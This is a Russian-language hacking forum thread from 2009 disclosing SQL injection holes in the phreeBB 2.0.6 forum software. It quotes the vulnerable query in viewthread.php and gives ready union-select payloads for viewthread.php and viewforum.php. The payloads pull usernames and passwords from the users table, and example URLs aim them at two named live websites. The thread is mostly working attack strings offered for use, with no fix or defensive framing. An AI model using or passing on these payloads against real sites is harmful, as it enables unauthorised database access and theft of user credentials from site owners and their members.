phreeBB 2.0.6

Discussion in 'Веб-уязвимости' started by Ded MustD!e, 27 Aug 2009.

  1. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Не путать с phpBB!

    SQL-Inj

    Продукт: phreeBB
    Версия: 2.0.6
    Уязвимый скрипт: viewthread.php

    PHP:
    $result mysql_query("SELECT * FROM viewForums WHERE view=$id");
     
    $msgData mysql_fetch_array($result);
    Эксплойт:
    Code:
    -1/**/union/**/select/**/1,2,3,concat_ws(0x3a,userName,userPass),5,6,7,8,9,10/**/from/**/users--+
    Пример:
    Code:
    http://www.vespaclubbiella.it/forum/viewthread.php?forumid=2&id=-42/**/union/**/select/**/1,2,3,concat_ws(0x3a,userName,userPass),5,6,7,8,9,10/**/from/**/users--+
     
    8 people like this.
  2. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    943
    Likes Received:
    827
    Reputations:
    605
    А че дальше то недобил Дедуль)))))
    чет случайно наткнулся)))У меня сорцов нету , не смог ни где скачать)((((((

    Файл : viewforum.php
    exploit :

    Code:
    -1+union+select+1,concat_ws(0x3a,userName,userPass),3,4,5,6,7,8+from+users--
    Пример:
    Code:
    http://ilcuckold.altervista.org/forum/viewforum.php?id=-1+union+select+1,concat_ws(0x3a,userName,userPass),3,4,5,6,7,8+from+users--
     
    _________________________
    #2 HAXTA4OK, 13 Nov 2009
    Last edited: 13 Nov 2009
    3 people like this.